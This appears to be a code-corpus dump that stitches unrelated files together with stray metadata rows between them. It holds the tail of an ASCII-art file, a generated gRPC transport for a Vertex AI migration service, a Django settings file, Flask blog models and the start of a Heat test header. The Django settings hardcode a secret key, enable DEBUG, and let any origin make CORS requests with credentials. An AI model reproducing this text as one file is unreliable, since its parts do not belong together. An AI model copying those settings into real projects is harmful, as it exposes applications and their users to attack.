#ttttitttttttttttItttttttttIIYIIIYXXXRBRXXXVVVXXVVYYVXXVVYIVRRRXXRMVItttttttttttttttttttttttttttttttttttIIItttIttIIIIt
#tttttttttttttttttttttttIItIIIYIIIVRVXRRRXRXXVYVXXXXXVVYYIYXRRXVVBWVttttttttttttttttttttttttttttttttttttIIIttttttIIIIt
#ttttttttttttttItttIIttttIttIIIIIIIVXVYRRRRRRVYIYYYYIIIIIIVRBXVVYBWYtttttttttttttttttttttttttttttttttttIIIIItttIIIIIIt
#ttttttttttttttIIIItIItttIttIIIIIIIYVRXYXBRXRRXYIIIttIttIVRBXVYYYBWVtttttttttttttttttttttttttttttttttttIIIIItttIIIIIIt
#tIttttttttttIIIIIIIIItttItttIIIIIIYYXXXYVRRRRRXYIYIIIYYVRRXYYYIIMWXttttttttttttttttttttttttttttttttttttIIIItttIIIIIII
#ttttttttttttIIIIIIIIItttIIttIIIIIIYIXXXXVVXRRRBXVYYYYYXRRVYIIIIIBRYttttttttttttttttttttttttttttttttttttIIIIItIIIIIIIt
#tttttttttIIIIIIIIIIIItttIItttIIIIIIIYRVXXXVVXRRBBRRRRRRVItIIttIIVItttttttttttttttttttttttttttttttttttttIIIIItIIIIIIIt
#tttttttIIIIIIIIIIIIIItttIIIttIIIIIIIIVBVVVVVVYVXXXXVVYIttttttIItttttttttttttttttIttttttttttttttttttttttIIIIItIIIIIIIt
#tttIttttttIIIIIIIIIttttIIIItttIIIIIIIIRMYIYYYYYIIttttitttttttItttttttttttttttIIItttttttttttttttttttttttIItIIIIIIIIIIt
#tttIIIIIIIIIIIIIIIIIttttIIIIttIIIIYIIIYBMYttIIIItttttttttttttttttttttttttttttttttttttttttttttttttttttttIItIIIIIIIIIIt
#IIIIIIIIIIIIIIIIIIIIIttttIIItttIIIIIIIIVMMYittttttttitttttttIttttItttIIItttttttttttttttttttttttttttttttIIIIIIIIIIIIII
#IIIIIIIIIIIIIIIIIIIIIItttIIIItttIIIIIIYtXWMYitiiiiiiiitttttIItttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIIII
#IIIIIIIIIIIIIIIIIIIIItIIttIIIIttIIIIIIIIIRWRIttiiiiiiiittttIItttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIIII
#IIIIIIIIIIIttttttttttttIIttIIIttIIIIIIIIIIVYIItttiiiiiittttIItttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIIII
#IIIIIIIIIIIIttIIItIIIIIIIIIIIIIttIIIIIIIIIIttIIIItitiittttIIttttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIIYI
#IIIIIIIIIIIIIttIItIIIIIIIttIIIItttIIIIIIttttttIItIIIttttttItttttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIYYI
#IIIIIIIIIIIIIttIItIIIIIIIttIIIItttIIIIIIttttIItIIIItIttttIItttttttIIttttttttttttttttttttttttttttttttttttIIIIIIYYIIYYI
#IIIIIIIIIIIIIttIIIIIItItttttIIIIttttIIIItttIYIttIIIIIIIItIttttttIItttttttttttttttttttttttttttttttttttttIIIIIIIYYIIYYI
#IIIIIIIIIIIIIttIIIIIItttttttIIIItttttIIItIIIIYIttIttttIIIItttttIIttttttttttttttttttttttttttttttttttttttIIIIIIYYYIIYYI
|
gpl-2.0
| -1,536,256,754,729,362,000
| 70.308108
| 352
| 0.673817
| false
| 2.625274
| false
| false
| false
|
googleapis/googleapis-gen
|
google/cloud/aiplatform/v1/aiplatform-v1-py/google/cloud/aiplatform_v1/services/migration_service/transports/grpc_asyncio.py
|
1
|
14287
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1 # type: ignore
from google.api_core import grpc_helpers_async # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import packaging.version
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.cloud.aiplatform_v1.types import migration_service
from google.longrunning import operations_pb2 # type: ignore
from .base import MigrationServiceTransport, DEFAULT_CLIENT_INFO
from .grpc import MigrationServiceGrpcTransport
class MigrationServiceGrpcAsyncIOTransport(MigrationServiceTransport):
"""gRPC AsyncIO backend transport for MigrationService.
A service that migrates resources from automl.googleapis.com,
datalabeling.googleapis.com and ml.googleapis.com to Vertex AI.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(cls,
host: str = 'aiplatform.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs
)
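    # Illustrative sketch (not part of the generated file): the channel can be
    # created directly, although the constructor below normally does this for
    # you. ``my_credentials`` is a hypothetical google.auth credentials object.
    #
    #     channel = MigrationServiceGrpcAsyncIOTransport.create_channel(
    #         'aiplatform.googleapis.com',
    #         credentials=my_credentials,
    #     )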
def __init__(self, *,
host: str = 'aiplatform.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
channel (Optional[aio.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
                ``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
            always_use_jwt_access (Optional[bool]): Whether self-signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
self._operations_client = None
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def operations_client(self) -> operations_v1.OperationsAsyncClient:
"""Create the client designed to process long-running operations.
This property caches on the instance; repeated calls return the same
client.
"""
# Sanity check: Only create a new client if we do not already have one.
if self._operations_client is None:
self._operations_client = operations_v1.OperationsAsyncClient(
self.grpc_channel
)
# Return the client from cache.
return self._operations_client
@property
def search_migratable_resources(self) -> Callable[
[migration_service.SearchMigratableResourcesRequest],
Awaitable[migration_service.SearchMigratableResourcesResponse]]:
r"""Return a callable for the search migratable resources method over gRPC.
Searches all of the resources in
automl.googleapis.com, datalabeling.googleapis.com and
ml.googleapis.com that can be migrated to Vertex AI's
given location.
Returns:
Callable[[~.SearchMigratableResourcesRequest],
Awaitable[~.SearchMigratableResourcesResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'search_migratable_resources' not in self._stubs:
self._stubs['search_migratable_resources'] = self.grpc_channel.unary_unary(
'/google.cloud.aiplatform.v1.MigrationService/SearchMigratableResources',
request_serializer=migration_service.SearchMigratableResourcesRequest.serialize,
response_deserializer=migration_service.SearchMigratableResourcesResponse.deserialize,
)
return self._stubs['search_migratable_resources']
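    # Illustrative sketch (assumption, not generated code): the stub returned by
    # the property above is awaitable; a hypothetical direct call would be
    #
    #     request = migration_service.SearchMigratableResourcesRequest(
    #         parent='projects/my-project/locations/us-central1')
    #     response = await transport.search_migratable_resources(request)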
@property
def batch_migrate_resources(self) -> Callable[
[migration_service.BatchMigrateResourcesRequest],
Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the batch migrate resources method over gRPC.
Batch migrates resources from ml.googleapis.com,
automl.googleapis.com, and datalabeling.googleapis.com
to Vertex AI.
Returns:
Callable[[~.BatchMigrateResourcesRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'batch_migrate_resources' not in self._stubs:
self._stubs['batch_migrate_resources'] = self.grpc_channel.unary_unary(
'/google.cloud.aiplatform.v1.MigrationService/BatchMigrateResources',
request_serializer=migration_service.BatchMigrateResourcesRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs['batch_migrate_resources']
__all__ = (
'MigrationServiceGrpcAsyncIOTransport',
)
|
apache-2.0
| -6,148,530,257,652,525,000
| 45.537459
| 102
| 0.623084
| false
| 4.735499
| false
| false
| false
|
mhefley/hackart
|
hackart/settings.py
|
1
|
4632
|
"""
Django settings for hackart project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '7$x4x@#=w^_@d*yep49wfla2)lvu^!g)&+ea76n2xjkqyno(n#'
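# A minimal sketch, not part of the original settings: in production the key
# would typically come from the environment rather than source control, e.g.
# SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY', SECRET_KEY)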
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['gitlab.nullify.online']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
#App specific
'rest_framework',
'api',
'corsheaders'
]
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
#'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
'rest_framework.permissions.IsAuthenticated'
],
'PAGE_SIZE': 10,
'EXCEPTION_HANDLER': 'rest_framework_json_api.exceptions.exception_handler',
'DEFAULT_PAGINATION_CLASS':
'rest_framework_json_api.pagination.PageNumberPagination',
'DEFAULT_PARSER_CLASSES': (
'rest_framework_json_api.parsers.JSONParser',
'rest_framework.parsers.FormParser',
'rest_framework.parsers.MultiPartParser'
),
'DEFAULT_AUTHENTICATION_CLASSES': [
'api.rest_framework_config.CsrfExemptSessionAuthentication',
'rest_framework.authentication.SessionAuthentication'
],
'DEFAULT_RENDERER_CLASSES': (
'rest_framework_json_api.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_METADATA_CLASS': 'rest_framework_json_api.metadata.JSONAPIMetadata',
}
MIDDLEWARE_CLASSES = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    # CorsMiddleware must come before CommonMiddleware.
    'corsheaders.middleware.CorsMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_CREDENTIALS = True
ROOT_URLCONF = 'hackart.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hackart.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
|
mit
| -2,741,053,265,845,104,000
| 27.316456
| 91
| 0.668826
| false
| 3.650118
| false
| false
| false
|
Blackyukun/Simpleblog
|
app/models.py
|
1
|
15497
|
import datetime
from flask_login import UserMixin, AnonymousUserMixin
from flask import current_app, request, url_for
from hashlib import md5
from werkzeug.security import generate_password_hash, check_password_hash
from markdown import markdown
import bleach
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from app.exceptions import ValidationError
from app import db, lm, whooshee
"""
generate_password_hash(password, method=pbkdf2:sha1, salt_length=8):这个函数将原始密码作为输入,
以字符串形式输出密码的散列值,输出的值可保存在用户数据库中,
method和salt_length的默认值就能满足大多数需求。
check_password_hash(hash, password):这个函数的参数是从数据库中取回的密码散列值和用户输入的密码。
返回值为True表明密码正确。
flask_login的UserMixin类,实现了用户方法:
is_authenticated:如果用户已经登录,必须返回True,否则返回False
is_active:如果允许用户登录,必须返回True,否则返回False。如果要禁用账户,可以返回False
is_anonymous:对普通用户必须返回False
fet_id():必须返回用户的唯一标识符,使用Unicode编码字符串
实现了关注和被关注的多对多数据模型,followed和followers关系都定义为单独的一对多关系。
必须使用可选参数foreign_keys指定的外键,用来消除外键简的歧义。
db.backref()参数并非指定这两个关系之间的引用关系,而是回引Follow模型。回引的lazy参数为joined。
cascade参数的值是一组由逗号分隔的层叠选项,all表示除了dalete-orphan之外的所有层叠选项。
意思是启用所有默认层叠选项,而且还要删除孤记录。
is_following()方法和is_followed_by()方法分别在左右两边的一对多关系中搜索指定用户,如果找到就返回True
获取关注用户的文章:
db.session.query(Post)指明这个查询要返回Post对象
select_from(Follow)的意思是这个查询从Follow模型开始
filter_by(follower_id=self.id)使用关注用户过滤follows表
join(Post, Follow.followed_id==Post.author_id)联结filter_by()得到的结果和Post对象
角色模型的permissions字段的值是一个整数,表示位标志。各操作都对应一个位位置,能执行某项操作的角色,其位会被设为1
程序权限:
关注用户:0x01
发表评论:0x02
发表文章或提问:0x04
管理他人评论:0x08
管理员:0x80
用户角色:
游客:0x00 未登录的用户,只有阅读权限
用户:0x07 具有发布文章,提问,评论和关注用户的权限,默认角色
小管家:0x0f 审查不当评论的权限
管理员:0xff 有所有权限,包括修改用户角色权限
创建数据库后,需要创建用户角色,先更新数据库,然后:
使用python manage.py shell
>>> Role.insert_roles()
>>> Role.query.all()
Comment模型和Post模型的属性一样,但是多了个disabled字段。这是个布尔值字段,作者可以通过这个字段查禁不当评论。
Post模型也添加disabled字段。
会话模型中,lazy='joined'指明加载记录,使用联结,primaryjoin明确指定两个模型之间使用的联结条件。
为了消除外键之间的歧义,定义关系时必须使用可选参数 foreign_keys 指定的外键。
cascade 参数的值是一组有逗号分隔的层叠选项,all 表示除了 delete-orphan 之外的所有层叠选项。
all,delete-orphan 的意思是启用所有默认层叠选项,而且还要删除孤儿记录。
在User模型上添加基于令牌的认证方法:
generate_auth_token()方法使用编码后的用户id字段值生成一个签名令牌,指定了以秒为单位的过期时间。
verify_auth_token()方法接收的参数是一个令牌,如果令牌可用就返回对应的用户。
"""
# Follow association table
class Follow(db.Model):
__tablename__ = 'follows'
follower_id = db.Column(db.Integer, db.ForeignKey('users.id'), primary_key=True)
followed_id = db.Column(db.Integer, db.ForeignKey('users.id'), primary_key=True)
unread = db.Column(db.Boolean, default=True)
timestamp = db.Column(db.DateTime, default=datetime.datetime.utcnow)
# messages = db.relationship('Message', backref='follow', uselist=False)
class User(UserMixin,db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
nickname = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
password_hash = db.Column(db.String(128))
    # Relationships
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
posts = db.relationship('Post', backref='author', lazy='dynamic')
# post_id = db.Column(db.Integer, db.ForeignKey('posts.id'))
likes = db.relationship('Like', backref='user', lazy='dynamic')
comments = db.relationship('Comment', backref='author', lazy='dynamic')
# reply_comments = db.relationship('Reply', backref='author', lazy='dynamic')
    # Profile information
about_me = db.Column(db.String(140))
last_seen = db.Column(db.DateTime)
    # Following and followers
followed = db.relationship('Follow',
foreign_keys = [Follow.follower_id],
backref = db.backref('follower', lazy='joined'),
lazy = 'dynamic',
cascade = 'all, delete-orphan')
followers = db.relationship('Follow',
foreign_keys=[Follow.followed_id],
backref=db.backref('followed', lazy='joined'),
lazy='dynamic',
cascade='all, delete-orphan')
def __init__(self, **kwargs):
super(User, self).__init__(**kwargs)
if self.role is None:
if self.email == current_app.config['ADMINMAIL']:
self.role = Role.query.filter_by(permissions=0xff).first()
if self.role is None:
self.role = Role.query.filter_by(default=True).first()
    # Check whether the user has the given permissions
def operation(self, permissions):
return self.role is not None and \
(self.role.permissions & permissions) == permissions
def is_administrator(self):
return self.operation(Permission.ADMINISTER)
    # Follow a user
def follow(self, user):
if not self.is_following(user):
follower = Follow(follower=self, followed=user)
db.session.add(follower)
    # Unfollow a user
def unfollow(self, user):
follower =self.followed.filter_by(followed_id=user.id).first()
if follower:
db.session.delete(follower)
    # Query the followed relationship: it returns all (follower, followed)
    # pairs in which the current user is the follower
def is_following(self, user):
return self.followed.filter_by(followed_id=user.id).first() is not None
def is_followed_by(self, user):
return self.followers.filter_by(follower_id=user.id).first() is not None
    # Get posts written by followed users
@property
def followed_posts(self):
return Post.query.join(Follow, Follow.followed_id==Post.author_id).filter(
Follow.follower_id==self.id)
    # Built-in Python decorator that turns a method into a property
@property
def password(self):
raise AttributeError('password is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
    # User avatars served by Gravatar
def gravatar(self, size):
return 'http://www.gravatar.com/avatar/' + md5(self.email.encode('utf-8')).hexdigest() + '?d=mm&s=' + str(size)
    # Support for token-based authentication
def generate_auth_token(self, expiration):
        s = Serializer(current_app.config['SECRET_KEY'], expires_in=expiration)
return s.dumps({'id': self.id})
@staticmethod
def verify_auth_token(token):
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except:
return None
return User.query.get(data['id'])
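    # Illustrative sketch (assumption, not part of the original model): a token
    # round trip with the two methods above would look like
    #
    #     token = user.generate_auth_token(expiration=3600)
    #     same_user = User.verify_auth_token(token)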
    # Serialize the user into a JSON-ready dictionary
    # The content exposed to clients need not match the database model exactly
def to_json(self):
json_user = {
'url': url_for('api.get_user', id=self.id, _external=True),
'nickname': self.nickname,
'last_seen': self.last_seen,
'posts': url_for('api.get_user_posts', id=self.id, _external=True),
'followed_posts': url_for('api.get_user_followed_posts', id=self.id, _external=True),
'post_count': self.posts.count()
}
return json_user
def __repr__(self):
return '<User %r>' % (self.nickname)
@lm.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
default = db.Column(db.Boolean, default=False, index=True)
permissions = db.Column(db.Integer)
users = db.relationship('User', backref = 'role', lazy='dynamic')
@staticmethod
def insert_roles():
roles = {
'User': (Permission.FOLLOW |
Permission.COMMENT |
Permission.WRITE_ARTICLES, True),
'Moderator': (Permission.FOLLOW |
Permission.COMMENT |
Permission.WRITE_ARTICLES |
Permission.MODERATE_COMMENTS, False),
'Administrator': (0xff, False)
}
for r in roles:
role = Role.query.filter_by(name=r).first()
if role is None:
role = Role(name=r)
role.permissions = roles[r][0]
role.default = roles[r][1]
db.session.add(role)
db.session.commit()
def __repr__(self):
return '<Role %r>' % (self.name)
class Permission:
FOLLOW = 0x01
COMMENT = 0x02
WRITE_ARTICLES = 0x04
MODERATE_COMMENTS = 0x08
ADMINISTER = 0x80
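# Worked example of the bit-flag check (illustrative only): the default User
# role has permissions 0x07, so
#     0x07 & Permission.WRITE_ARTICLES == 0x04    -> may publish articles
#     0x07 & Permission.MODERATE_COMMENTS == 0x00 -> may not moderate comments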
@whooshee.register_model('title','body')
class Post(db.Model):
__tablename__ = 'posts'
# __searchable__ = ['body']
id = db.Column(db.Integer, primary_key = True)
title = db.Column(db.String(64))
body = db.Column(db.Text)
disabled = db.Column(db.Boolean)
view_num = db.Column(db.Integer, default=0)
body_html = db.Column(db.Text)
draft = db.Column(db.Boolean, default=False)
# outline = db.Column(db.String(250))
# like_num = db.Column(db.Integer, default=0)
timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow)
author_id = db.Column(db.Integer, db.ForeignKey('users.id'))
like_num = db.relationship('Like', backref='post', lazy='dynamic')
comments = db.relationship('Comment', backref='post', lazy='dynamic')
# reply_comments = db.relationship('Reply', backref='post', lazy='dynamic')
@staticmethod
def preview_body(target, value, oldvalue, initiator):
allowed_tags = [
'a', 'abbr', 'acronym', 'b', 'img', 'blockquote', 'code',
'em', 'i', 'li', 'ol', 'pre', 'strong', 'ul', 'h1', 'h2',
'h3', 'p'
]
target.body_html = bleach.linkify(bleach.clean(
markdown(value, output_format='html'),
tags=allowed_tags, strip=True,
attributes={
'*': ['class'],
'a': ['href', 'rel'],
                'img': ['src', 'alt'],  # supported tags and attributes
}
))
    # Serialize the post into a JSON-ready dictionary
def to_json(self):
json_post = {
'url': url_for('api.get_post', id=self.id, _external=True),
'title': self.title,
'body': self.body,
'body_html': self.body_html,
'timestamp': self.timestamp,
'author': url_for('api.get_user', id=self.author_id, _external=True),
'comments': url_for('api.get_post_comments', id=self.id, _external=True),
'comment_count': self.comments.count()
}
return json_post
@staticmethod
def from_json(json_post):
body = json_post.get('body')
title = json_post.get('title')
if body is None or body == '':
raise ValidationError('post does not have a body')
if title is None or title == '':
raise ValidationError('post does not have a title')
return Post(body=body,title=title)
def __repr__(self):
return '<Post %r>' % (self.body)
db.event.listen(Post.body, 'set', Post.preview_body)
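# Illustrative sketch (assumption): the 'set' listener above fires on attribute
# assignment, so setting the body renders the sanitized HTML as a side effect:
#
#     post = Post(title='demo')
#     post.body = '**hello**'  # triggers preview_body, fills post.body_html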
# Class used for permission checks on anonymous (not logged-in) users
class AnonymousUser(AnonymousUserMixin):
def operation(self, permissions):
return False
def is_administrator(self):
return False
lm.anonymous_user = AnonymousUser
# Likes
class Like(db.Model):
__tablename__ = 'likes'
id = db.Column(db.Integer, primary_key=True)
unread = db.Column(db.Boolean, default=True)
    timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow)
liker_id = db.Column(db.Integer, db.ForeignKey('users.id'))
post_id = db.Column(db.Integer, db.ForeignKey('posts.id'))
class Comment(db.Model):
__tablename__ = 'comments'
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.Text)
body_html = db.Column(db.Text)
    timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow)
disabled = db.Column(db.Boolean)
comment_type = db.Column(db.String(64), default='comment')
reply_to = db.Column(db.String(128), default='notReply')
unread = db.Column(db.Boolean)
author_id = db.Column(db.Integer, db.ForeignKey('users.id'))
post_id = db.Column(db.Integer, db.ForeignKey('posts.id'))
@staticmethod
def on_changed_body(target, value, oldvalue, initiator):
allowed_tags = [
'a', 'abbr', 'acronym', 'b', 'code', 'em', 'img', 'i', 'strong'
]
target.body_html = bleach.linkify(bleach.clean(
markdown(value, output_format='html'),
tags=allowed_tags, strip=True
))
db.event.listen(Comment.body, 'set', Comment.on_changed_body)
# Private-message conversations
class Conversation(db.Model):
__tablename__ = 'conversations'
id = db.Column(db.Integer, primary_key=True)
from_user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
to_user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
letter = db.Column(db.String(255))
    timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow)
unread = db.Column(db.Boolean, default=True)
to_user = db.relationship('User', lazy='joined', foreign_keys=[to_user_id])
from_user = db.relationship('User', lazy='joined', foreign_keys=[from_user_id])
# Admin notices
class Admin(db.Model):
__tablename__ = 'admin'
id = db.Column(db.Integer, primary_key=True)
notice = db.Column(db.String(25))
    timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow)
def __repr__(self):
return '<Admin %r>' % (self.notice)
|
mit
| 6,585,300,988,462,585,000
| 35.289973
| 119
| 0.631917
| false
| 2.672854
| false
| false
| false
|
maestro-hybrid-cloud/heat
|
heat/tests/test_sahara_templates.py
|
1
|
14859
|
# Copyright (c) 2014 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
